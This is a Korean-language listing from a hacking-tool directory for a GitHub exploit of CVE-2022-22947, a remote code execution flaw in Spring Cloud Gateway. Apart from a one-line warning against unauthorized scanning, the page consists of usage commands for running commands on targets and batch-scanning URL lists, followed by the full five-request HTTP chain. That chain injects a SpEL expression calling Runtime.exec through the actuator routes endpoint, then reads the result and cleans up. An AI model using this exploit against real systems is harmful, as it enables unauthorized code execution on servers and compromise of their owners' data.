Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-22947-Spring-Cloud-Gateway — CVE-2022-22947 일괄 처리 | Kitploit
도구/GitHubGitHub/tangxiaofeng7/cve-2022-22947-spring-cloud-gateway
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtangxiaofeng7/cve-2022-22947-spring-cloud-gateway

CVE-2022-22947-Spring-Cloud-Gateway

CVE-2022-22947 일괄 처리

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
712014년 전Kitploit 검토 완료

Spring Cloud Gateway 원격 코드 실행 취약점

이 취약점은 운영 중인 서비스에 위험도가 높으므로, 허가 없이 스캔하지 마십시오.

사용 설명
root@kitploit:~
╰─ ./CVE-2022-22947 -h                                                                                                                                                                                                                                            ─╯
실행 명령: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami 
일괄 탐지: ./CVE-2022-22947 -l url.txt 
취약점 환경 실행
root@kitploit:~
java -jar vuln/spring-gateway-demo-0.0.1-SNAPSHOT.jar 
취약점은 5개의 요청으로 구성됩니다

첫 번째 요청(다음 패킷을 전송하여 악성 SpEL 표현식이 포함된 라우트를 추가)

root@kitploit:~
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 366

{
      "id": "hacktest",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
        }],
      "uri": "http://example.com",
      "order": 0
    }

두 번째 요청(방금 추가한 라우트를 새로고침)

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

세 번째 요청(실행 결과 확인)

root@kitploit:~
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

네 번째 요청(추가한 라우트 정리)

root@kitploit:~
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

다섯 번째 요청(라우트 새로고침)

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

감사의 말

JAR 파일 출처: 清水川崎 ; EXP 출처: phith0n

도구 다운로드